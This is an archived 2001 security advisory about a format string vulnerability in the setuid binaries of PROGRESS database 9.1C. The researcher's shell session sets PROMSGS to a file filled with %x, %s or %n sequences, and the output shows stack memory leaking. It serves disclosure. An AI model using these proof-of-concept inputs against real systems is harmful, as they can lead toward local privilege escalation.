Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps N-Z :: lnx4840.htm

Progress database (format string overflow)



5th Nov 2001 [SBWID-4840]
COMMAND

	Progress database (format string overflow)

SYSTEMS AFFECTED

	PROGRESS Version 9.1C

PROBLEM

	KF <dotslash@snosoft.com> found following :
	

	Well once again I have found yet another Progress  database  issue.  The
	PROMSGS has been looked at one time already  for  buffer  overflows.  It
	was supposed to be fixed. I was poking around at it  today  and  noticed
	these format strings issues... PROGRESS Version 9.1C as  of  Thu  Jun  7
	10:03:59 EDT 2001
	

	First test with a malformed PROMSGS.
	

	 [elguapo@linux bin]$ echo blah > file

	 [elguapo@linux bin]$ export PROMSGS=./file

	 [elguapo@linux bin]$ ./_probuild

	 

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 290

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 96

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 6063

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 24

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 912

	

	

	Test  to  make  sure  they  fixed  my  original  hole  with  the  buffer
	overflows. (looks fine)
	

	 [elguapo@linux bin]$ echo `perl -e \'print \"A\" x 20000\'` > file

	 [elguapo@linux bin]$ ./_probuild

	 

	Error formatting messaage 96.  Message file is corrupt.

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 6063

	Error formatting messaage 24.  Message file is corrupt.

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 912

	

	

	Well if you use a format string instead of  an  A  we  get  much  better
	results.
	

	 [elguapo@linux bin]$ echo `perl -e \'print \"%x\" x 9000\'` > file

	 [elguapo@linux bin]$ ./_probuild

	 

	Error formatting messaage 96.  Message file is corrupt.

	0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x80618450x00x83e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5f2c0x10000x401e44a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 6063

	Error formatting messaage 24.  Message file is corrupt.

	0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x83e3ec00xbffff5440x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff56d%

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 912

	

	

	 [elguapo@linux bin]$ echo `perl -e \'print \"%s\" x 9000\'` > file

	 [elguapo@linux bin]$ ./_probuild

	 

	Error formatting messaage 96.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	rcurctr overflow reading promsgs file.

	(note the overflow msg)

	

	

	 [elguapo@linux bin]$ echo `perl -e \'print \"%n\" x 9000\'` > file

	 [elguapo@linux bin]$ ./_probuild

	 

	Error formatting messaage 96.  Message file is corrupt.

	0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-68928197281972819728197281972819728197-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)24364409617568-2456-3395409624364-2280-3414%

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 6063

	Error formatting messaage 24.  Message file is corrupt.

	-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)128578246822421057139041978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)160645512138-2643146-2707%

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 912

	

	ALL suids in the dlc/bin dir are affected
	

	

	

SOLUTION

	Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH